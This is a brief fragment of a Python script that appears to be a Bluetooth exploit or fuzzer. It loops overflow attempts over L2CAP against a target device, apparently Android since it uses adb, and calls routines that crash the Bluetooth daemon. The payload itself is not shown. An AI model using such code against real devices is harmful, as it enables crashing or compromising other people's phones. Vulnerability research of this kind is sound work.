                    adb_target_crashed = False
                    adb_interesting_crash = False
                    
                    # Bluetooth deamon crashed
                    do_crash_bluetooth_deamon(spray_packet=False)                   
                    break
                
            else:
                # Target not more ready but no adb to check what's happened => Target crashed by overflow !!!
                print_console ("\033[;31mTarget crashed by overflow after disconnect !!!\033[;0m")
                sys.exit(0)

            # Wait for new handle before next overflow loop
            if not do_connect_l2cap(timeout=10):
                # Bluetooth deamon crashed
                do_crash_bluetooth_deamon(spray_packet=False)                   


    raw_input_console("Done")